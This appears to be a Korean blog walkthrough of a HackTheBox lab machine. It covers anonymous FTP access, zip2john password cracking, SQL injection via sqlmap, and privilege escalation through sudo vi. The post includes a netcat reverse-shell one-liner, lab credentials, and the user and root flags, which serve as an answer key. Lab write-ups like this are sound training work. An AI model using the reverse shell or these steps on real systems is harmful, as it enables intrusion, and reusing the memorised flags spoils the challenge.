TASK 1
Besides SSH and HTTP, what other service is hosted on this box?
답 : FTP
TASK 2
This service can be configured to allow login with any password for specific username. What is that username?
답 : anonymous
TASK 3
What is the name of the file downloaded over this service?
답 : backup.zip
TASK 4
What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?
ftp에서 밭은 backup.zip파일이 잠겨있다.
zip2john을 사용해서 크랙 해보자.
답 : zip2john
압축 해제 완료!!
TASK 5
What is the password for the admin user on the website?
index.php를 열어보자.
Username은 admin이고, password는 md5로 복호화해야 한다.
ID : admin
PW : qwerty789
답 : qwerty789
로그인하고.. 검색창에서 sqli가 가능할 것이라는 생각이 들었다.
sqlmap으로 확인해 보자.쿠키 값이 필요하다.)
연결이 되는 것을 확인했다.
이제 nc를 열어서 좀 더 편하게 사용해 보자.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP> <PORT> >/tmp/f
연결이 완료된 것을 확인할 수 있다.
TASK 6
What option can be passed to sqlmap to try to get command execution via the sql injection?
답 : --os-shell
sudo -l을 사용하려면 사용자 계정과 비밀번호를 알아야 한다.
/www/var/html로 이동해서 dashboard.php파일을 열어보자.
ID : postgres
PW : P@s5w0rd!
로그인 성공!!
TASK 7
What program can the postgres user run as root using sudo?
답 : vi
SUBMIT FLAG
Submit user flag
답 : ec9b13ca4d6229cd5cc1e09980965bf7
SUBMIT FLAG
Submit root flag
(b)를 사용하여 root flag를 얻을 수 있다.
답 : dd6e058e814260bc70e9bbdef2715849
'HackTheBox' 카테고리의 다른 글
| [HTB] Unified (0) | 2023.03.29 |
|---|---|
| [HTB] Oopsie (0) | 2023.03.23 |
| [HTB] ArcheType (0) | 2023.03.23 |
| [HTB] Tactics (0) | 2023.03.22 |
| [HTB] Pennyworth (0) | 2023.03.22 |